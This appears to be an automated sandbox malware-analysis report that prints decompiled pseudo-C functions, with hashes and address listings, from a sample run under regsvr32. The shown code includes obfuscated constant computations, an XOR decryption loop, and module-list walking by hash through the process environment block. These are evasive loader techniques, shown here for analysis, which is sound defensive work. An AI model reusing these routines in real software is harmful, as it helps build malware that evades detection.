                                                                                                                0x001bf6d2
                                                                                                                0x001bf6e3
                                                                                                                0x001bf6e8
                                                                                                                0x001bf6ea
                                                                                                                0x001bf6ee
                                                                                                                0x001bf6ee
                                                                                                                0x001bf6f0
                                                                                                                0x001bf6f3
                                                                                                                0x001bf6f8
                                                                                                                0x001bf700
                                                                                                                0x001bf706
                                                                                                                0x001bf70a
                                                                                                                0x001bf713
                                                                                                                0x001bf714
                                                                                                                0x001bf71b
                                                                                                                0x001bf71f
                                                                                                                0x001bf723
                                                                                                                0x001bf723
                                                                                                                0x001bf72e
                                                                                                                0x001bf72e
                                                                                                                0x001bf73a

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 69a078ab523a5daffc0b0976a2c64f30202ec81ba3f21039fdb029f83dbc7004
                                                                                                                • Instruction ID: 2304d35e1c30723d13ddb64ee2908a6b2ac06e2845d8ad19384c9a107df948ee
                                                                                                                • Opcode Fuzzy Hash: 69a078ab523a5daffc0b0976a2c64f30202ec81ba3f21039fdb029f83dbc7004
                                                                                                                • Instruction Fuzzy Hash: 09418C726183119FC354CF29C88546BFBE0FF88318F414A2DF99AA7210D775E949CB96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B8EF8 Relevance: .1, Instructions: 104COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E001B8EF8(void* __ecx, signed int* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				void* _t63;
				signed int _t71;
				signed int _t79;
				unsigned int _t83;
				signed int _t86;
				signed int _t88;
				signed int _t89;
				void* _t95;
				signed int _t102;
				void* _t107;
				intOrPtr _t108;
				signed int* _t109;
				signed int* _t110;
				signed int* _t111;

				_t109 = _a12;
				_t111 = __edx;
				_push(_t109);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001AC98A(_t63);
				_v8 = 0x81841c;
				_t108 = 0;
				_v4 = 0;
				_v24 = 0x9ca427;
				_t88 = 0x3c;
				_v24 = _v24 * 0x2e;
				_v24 = _v24 / _t88;
				_v24 = _v24 + 0x71d1;
				_v24 = _v24 ^ 0x00786fa3;
				_v20 = 0x266e1c;
				_v20 = _v20 + 0xffff7682;
				_v20 = _v20 >> 9;
				_v20 = _v20 ^ 0x000d4282;
				_v28 = 0x1696aa;
				_t89 = 0x6e;
				_v28 = _v28 / _t89;
				_v28 = _v28 + 0x84af;
				_v28 = _v28 * 0x77;
				_v28 = _v28 ^ 0x00592002;
				_a12 = 0xf328db;
				_a12 = _a12 << 9;
				_a12 = _a12 + 0x68cd;
				_a12 = _a12 << 2;
				_a12 = _a12 ^ 0x99412f8f;
				_t71 =  *_t109;
				_t110 =  &(_t109[2]);
				_t102 = _t109[1] ^ _t71;
				_v16 = _t71;
				_v12 = _t102;
				_t83 =  !=  ? (_t102 & 0xfffffffc) + 4 : _t102;
				_t79 = E001A303A(_t102 & 0x00000003, _t83);
				_a12 = _t79;
				if(_t79 != 0) {
					_t107 =  >  ? 0 :  &(_t110[_t83 >> 2]) - _t110 + 3 >> 2;
					if(_t107 != 0) {
						_t86 = _v16;
						_t95 = _t79 - _t110;
						do {
							_t108 = _t108 + 1;
							 *(_t95 + _t110) =  *_t110 ^ _t86;
							_t110 =  &(_t110[1]);
						} while (_t108 < _t107);
						_t79 = _a12;
					}
					if(_t111 != 0) {
						 *_t111 = _v12;
						return _t79;
					}
				}
				return _t79;
			}
























                                                                                                                0x001b8efe
                                                                                                                0x001b8f02
                                                                                                                0x001b8f05
                                                                                                                0x001b8f06
                                                                                                                0x001b8f0a
                                                                                                                0x001b8f0e
                                                                                                                0x001b8f10
                                                                                                                0x001b8f15
                                                                                                                0x001b8f1d
                                                                                                                0x001b8f1f
                                                                                                                0x001b8f25
                                                                                                                0x001b8f34
                                                                                                                0x001b8f37
                                                                                                                0x001b8f43
                                                                                                                0x001b8f47
                                                                                                                0x001b8f4f
                                                                                                                0x001b8f57
                                                                                                                0x001b8f5f
                                                                                                                0x001b8f67
                                                                                                                0x001b8f6c
                                                                                                                0x001b8f74
                                                                                                                0x001b8f80
                                                                                                                0x001b8f83
                                                                                                                0x001b8f87
                                                                                                                0x001b8f94
                                                                                                                0x001b8f98
                                                                                                                0x001b8fa0
                                                                                                                0x001b8fa8
                                                                                                                0x001b8fad
                                                                                                                0x001b8fb5
                                                                                                                0x001b8fba
                                                                                                                0x001b8fc2
                                                                                                                0x001b8fc7
                                                                                                                0x001b8fca
                                                                                                                0x001b8fcc
                                                                                                                0x001b8fd2
                                                                                                                0x001b8fe3
                                                                                                                0x001b8ffb
                                                                                                                0x001b9003
                                                                                                                0x001b9009
                                                                                                                0x001b901f
                                                                                                                0x001b9024
                                                                                                                0x001b9026
                                                                                                                0x001b902c
                                                                                                                0x001b902e
                                                                                                                0x001b9032
                                                                                                                0x001b9033
                                                                                                                0x001b9036
                                                                                                                0x001b9039
                                                                                                                0x001b903d
                                                                                                                0x001b903d
                                                                                                                0x001b9043
                                                                                                                0x001b9049
                                                                                                                0x00000000
                                                                                                                0x001b9049
                                                                                                                0x001b9043
                                                                                                                0x001b9053

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e57496d2c4da7939a623119ac7073f5259244425f4165802adbd11dc9958119
                                                                                                                • Instruction ID: feb4afdbfc4da0287113452d0c119cd426c13649dd17605bd2158cc75448bb8a
                                                                                                                • Opcode Fuzzy Hash: 4e57496d2c4da7939a623119ac7073f5259244425f4165802adbd11dc9958119
                                                                                                                • Instruction Fuzzy Hash: CF4145726183009FC358DF2AC88594BFBE6EFD8318F408A2DF99993250D7B6D9058F46
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B9054 Relevance: .1, Instructions: 88COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E001B9054(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _t95;
				signed int _t109;
				void* _t115;
				signed int _t116;

				_push(_a12);
				_t115 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001AC98A(_t95);
				_v44 = _v44 & 0x00000000;
				_v48 = 0x9e1a5;
				_v8 = 0xdc3688;
				_v8 = _v8 + 0x7ce0;
				_v8 = _v8 | 0xcd57f9a8;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0cd576a9;
				_v16 = 0x212d10;
				_v16 = _v16 + 0xffffc278;
				_v16 = _v16 + 0xffff272d;
				_v16 = _v16 | 0xc3a15b96;
				_v16 = _v16 ^ 0xc3acf350;
				_v24 = 0x990712;
				_v24 = _v24 << 0x10;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x80098d6a;
				_v12 = 0x3a9ba8;
				_v12 = _v12 | 0xafa1a83f;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0xd54525de;
				_v12 = _v12 ^ 0x6efb41b1;
				_v20 = 0x46b34b;
				_v20 = _v20 >> 4;
				_v20 = _v20 << 0xb;
				_v20 = _v20 << 0xa;
				_v20 = _v20 ^ 0x66867237;
				_v40 = 0x95e0b6;
				_v40 = _v40 ^ 0x4178c11d;
				_v40 = _v40 ^ 0x41eefde3;
				_v32 = 0x7e0534;
				_t109 = 0x3e;
				_v32 = _v32 / _t109;
				_v32 = _v32 * 0x48;
				_v32 = _v32 ^ 0x0095c58a;
				_v36 = 0xfe3c4e;
				_v36 = _v36 | 0xebbc6491;
				_v36 = _v36 ^ 0xebf9a972;
				E001ACCA2();
				_v28 = 0x95bdda;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 + 0xffffd3ae;
				_v28 = _v28 ^ 0xffffdd0d;
				_v8 = 0x118eac;
				_v8 = _v8 | 0xfe8faf7f;
				_v8 = _v8 ^ 0xfe9fafef;
				_push(_v8);
				_t116 = E001B96D4(_t109, _v28);
				E001A8744(_v20, _v40, 1, _v32, _t116, _t115, _v36);
				 *((short*)(_t115 + _t116 * 2)) = 0;
				return 0;
			}


















                                                                                                                0x001b905c
                                                                                                                0x001b905f
                                                                                                                0x001b9061
                                                                                                                0x001b9064
                                                                                                                0x001b9067
                                                                                                                0x001b9069
                                                                                                                0x001b906e
                                                                                                                0x001b9075
                                                                                                                0x001b907e
                                                                                                                0x001b9085
                                                                                                                0x001b908c
                                                                                                                0x001b9093
                                                                                                                0x001b9097
                                                                                                                0x001b909e
                                                                                                                0x001b90a5
                                                                                                                0x001b90ac
                                                                                                                0x001b90b3
                                                                                                                0x001b90ba
                                                                                                                0x001b90c1
                                                                                                                0x001b90c8
                                                                                                                0x001b90cc
                                                                                                                0x001b90d0
                                                                                                                0x001b90d7
                                                                                                                0x001b90de
                                                                                                                0x001b90e5
                                                                                                                0x001b90e9
                                                                                                                0x001b90f0
                                                                                                                0x001b90f7
                                                                                                                0x001b90fe
                                                                                                                0x001b9102
                                                                                                                0x001b9106
                                                                                                                0x001b910a
                                                                                                                0x001b9111
                                                                                                                0x001b9118
                                                                                                                0x001b911f
                                                                                                                0x001b9126
                                                                                                                0x001b9132
                                                                                                                0x001b9135
                                                                                                                0x001b913c
                                                                                                                0x001b913f
                                                                                                                0x001b9146
                                                                                                                0x001b914d
                                                                                                                0x001b9154
                                                                                                                0x001b915e
                                                                                                                0x001b9163
                                                                                                                0x001b916a
                                                                                                                0x001b916e
                                                                                                                0x001b9175
                                                                                                                0x001b917c
                                                                                                                0x001b9183
                                                                                                                0x001b918a
                                                                                                                0x001b919a
                                                                                                                0x001b91a9
                                                                                                                0x001b91b8
                                                                                                                0x001b91c2
                                                                                                                0x001b91cb

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bfd6b85d14858a20a4312930a7159a801d78a2fb2e3c1ccbf8bb7f41841aedae
                                                                                                                • Instruction ID: 387a4bbca418883065080b22e95fa0aeba59fd0b1bfd7230b725173a858abef6
                                                                                                                • Opcode Fuzzy Hash: bfd6b85d14858a20a4312930a7159a801d78a2fb2e3c1ccbf8bb7f41841aedae
                                                                                                                • Instruction Fuzzy Hash: 0141F0B5C01209EBCF19DFE5C94A9EEBBB0FB48304F208158D421B6250D3B54B55DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B17D2 Relevance: .1, Instructions: 71COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001B17D2(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _t83;
				signed int _t96;

				_push(_a4);
				_push(__ecx);
				E001AC98A(_t83);
				_v32 = _v32 & 0x00000000;
				_v44 = 0xe415c0;
				_v40 = 0xe426f4;
				_v36 = 0x5840d9;
				_v8 = 0xa0d481;
				_v8 = _v8 ^ 0x6de56bc4;
				_v8 = _v8 + 0xffff6d85;
				_t96 = 6;
				_v8 = _v8 * 0x3e;
				_v8 = _v8 ^ 0x76c3ea7e;
				_v16 = 0x87ce6f;
				_v16 = _v16 * 0x69;
				_v16 = _v16 * 0x7f;
				_v16 = _v16 ^ 0xa22a0e34;
				_v24 = 0x726ed0;
				_v24 = _v24 * 6;
				_v24 = _v24 | 0xdcb2b5b4;
				_v24 = _v24 ^ 0xdebc2230;
				_v12 = 0x37853f;
				_v12 = _v12 + 0x95c8;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 / _t96;
				_v12 = _v12 ^ 0x000f372d;
				_v24 = 0xe3a3ed;
				_v24 = _v24 << 3;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x71dc4959;
				_v24 = 0xe60ad8;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffff3ffd;
				_v24 = _v24 ^ 0x1cca9877;
				_v28 = 0xaba7da;
				_v28 = _v28 + 0xffffaec9;
				_v28 = _v28 ^ 0x00a22bfe;
				_v20 = 0xe9db9a;
				_v20 = _v20 >> 4;
				_v20 = _v20 | 0xa64ddeb7;
				_v20 = _v20 ^ 0xa64149f2;
				_v12 = 0x8eb6a4;
				_v12 = _v12 >> 4;
				_v12 = _v12 | 0xaec5c8d0;
				_v12 = _v12 ^ 0xaec0c394;
				return E001A6F64(_v24, _v28, _v20, _a4, _v12, E001B345B());
			}















                                                                                                                0x001b17d8
                                                                                                                0x001b17dc
                                                                                                                0x001b17dd
                                                                                                                0x001b17e2
                                                                                                                0x001b17e8
                                                                                                                0x001b17ef
                                                                                                                0x001b17f6
                                                                                                                0x001b17fd
                                                                                                                0x001b1804
                                                                                                                0x001b180b
                                                                                                                0x001b1818
                                                                                                                0x001b1819
                                                                                                                0x001b181c
                                                                                                                0x001b1823
                                                                                                                0x001b182e
                                                                                                                0x001b1835
                                                                                                                0x001b1838
                                                                                                                0x001b183f
                                                                                                                0x001b184a
                                                                                                                0x001b184d
                                                                                                                0x001b1854
                                                                                                                0x001b185b
                                                                                                                0x001b1862
                                                                                                                0x001b1869
                                                                                                                0x001b1872
                                                                                                                0x001b1875
                                                                                                                0x001b187c
                                                                                                                0x001b1883
                                                                                                                0x001b1887
                                                                                                                0x001b188b
                                                                                                                0x001b1892
                                                                                                                0x001b1899
                                                                                                                0x001b189d
                                                                                                                0x001b18a4
                                                                                                                0x001b18ab
                                                                                                                0x001b18b2
                                                                                                                0x001b18b9
                                                                                                                0x001b18c0
                                                                                                                0x001b18c7
                                                                                                                0x001b18cb
                                                                                                                0x001b18d2
                                                                                                                0x001b18d9
                                                                                                                0x001b18e0
                                                                                                                0x001b18e4
                                                                                                                0x001b18eb
                                                                                                                0x001b1918

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 041cf32466fb9e9b6543021d9aa768da6172e6cdea6da53cb281fa82c51a11e2
                                                                                                                • Instruction ID: 386fec2e976620f55cfd3ab391f0adb78894ea44dbffb0bade83c054f878267b
                                                                                                                • Opcode Fuzzy Hash: 041cf32466fb9e9b6543021d9aa768da6172e6cdea6da53cb281fa82c51a11e2
                                                                                                                • Instruction Fuzzy Hash: 3B31BCB1C0120EEBDF09DFE5DA4A5EEBBB4BB10304F208189D511BA264D7B05B44DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A806B Relevance: .1, Instructions: 67COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001A806B(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _t63;
				void* _t67;
				signed int _t69;
				intOrPtr* _t75;
				intOrPtr* _t76;
				void* _t77;

				_v32 = _v32 & 0x00000000;
				_v36 = 0x6fa8db;
				_v24 = 0xbff84a;
				_v24 = _v24 * 0x49;
				_t67 = __ecx;
				_v24 = _v24 ^ 0x36be5512;
				_v20 = 0xf2c735;
				_v20 = _v20 ^ 0x12edd835;
				_v20 = _v20 ^ 0x12178531;
				_v16 = 0xf65224;
				_v16 = _v16 ^ 0x11a19d06;
				_t69 = 0x13;
				_v16 = _v16 / _t69;
				_v16 = _v16 ^ 0x00ef7203;
				_v12 = 0x87fe1e;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x4514e006;
				_v12 = _v12 ^ 0xadfd13c8;
				_v12 = _v12 ^ 0xf711b3ae;
				_v28 = 0xa8ba97;
				_v28 = _v28 + 0xfffff9d1;
				_v28 = _v28 ^ 0x00ae1823;
				_v8 = 0xaa5f3a;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x3838b80e;
				_v8 = _v8 + 0xff56;
				_v8 = _v8 ^ 0x3a9fe257;
				_t75 =  *((intOrPtr*)(E001A32AC() + 0xc)) + 0xc;
				_t76 =  *_t75;
				while(_t76 != _t75) {
					_t63 = E001AB9F6(_v16, _v12, _v28,  *((intOrPtr*)(_t76 + 0x30)), _v8);
					_t77 = _t77 + 0xc;
					if((_t63 ^ 0x3241f2f8) == _t67) {
						return  *((intOrPtr*)(_t76 + 0x18));
					}
					_t76 =  *_t76;
				}
				return 0;
			}

















                                                                                                                0x001a8071
                                                                                                                0x001a8077
                                                                                                                0x001a807e
                                                                                                                0x001a808e
                                                                                                                0x001a8091
                                                                                                                0x001a8093
                                                                                                                0x001a809a
                                                                                                                0x001a80a1
                                                                                                                0x001a80a8
                                                                                                                0x001a80af
                                                                                                                0x001a80b6
                                                                                                                0x001a80c0
                                                                                                                0x001a80c3
                                                                                                                0x001a80c6
                                                                                                                0x001a80cd
                                                                                                                0x001a80d4
                                                                                                                0x001a80d8
                                                                                                                0x001a80df
                                                                                                                0x001a80e6
                                                                                                                0x001a80ed
                                                                                                                0x001a80f4
                                                                                                                0x001a80fb
                                                                                                                0x001a8102
                                                                                                                0x001a8109
                                                                                                                0x001a810d
                                                                                                                0x001a8114
                                                                                                                0x001a811b
                                                                                                                0x001a8130
                                                                                                                0x001a8133
                                                                                                                0x001a8159
                                                                                                                0x001a8146
                                                                                                                0x001a8150
                                                                                                                0x001a8155
                                                                                                                0x00000000
                                                                                                                0x001a8166
                                                                                                                0x001a8157
                                                                                                                0x001a8157
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bdc00781864607f5becd072fc887cab80e09326d7b9d7a31d15e5c76ac6b8b67
                                                                                                                • Instruction ID: a08c8d5c947b7df722b2fcafbc8219aea795a471b6d448d30aeb300abe34a2cc
                                                                                                                • Opcode Fuzzy Hash: bdc00781864607f5becd072fc887cab80e09326d7b9d7a31d15e5c76ac6b8b67
                                                                                                                • Instruction Fuzzy Hash: C9312076D0420AEFCB58CFE5DA8A4AEBBB1FB40314F2084A8D526B7210D3B15A05DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A32AC Relevance: .0, Instructions: 2COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001A32AC() {

				return  *[fs:0x30];
			}



                                                                                                                0x001a32b2

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10025A62 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E10025A62(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x1006dbdc; // 0xdf7c0cda
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E1003D1E6(E10053A71, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E10025295, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E10040EE1( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E1003BB70(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E100252AB(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E1002535B(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E10025391(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E1002590C(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E1002583F(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1003B437(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}
































                                                                                                                0x10025a62
                                                                                                                0x10025a63
                                                                                                                0x10025a69
                                                                                                                0x10025a6d
                                                                                                                0x10025a74
                                                                                                                0x10025a7a
                                                                                                                0x10025a81
                                                                                                                0x10025a92
                                                                                                                0x10025a99
                                                                                                                0x10025a9c
                                                                                                                0x10025a9f
                                                                                                                0x10025aa2
                                                                                                                0x10025ab0
                                                                                                                0x10025ab3
                                                                                                                0x10025ab7
                                                                                                                0x10025b85
                                                                                                                0x10025c41
                                                                                                                0x10025c45
                                                                                                                0x10025c59
                                                                                                                0x10025c5c
                                                                                                                0x10025c66
                                                                                                                0x10025c6c
                                                                                                                0x10025c84
                                                                                                                0x10025c90
                                                                                                                0x10025c95
                                                                                                                0x10025c98
                                                                                                                0x10025c98
                                                                                                                0x10025c66
                                                                                                                0x10025b8b
                                                                                                                0x10025b9f
                                                                                                                0x10025baa
                                                                                                                0x10025bc0
                                                                                                                0x10025bcf
                                                                                                                0x10025be7
                                                                                                                0x10025bec
                                                                                                                0x10025bf2
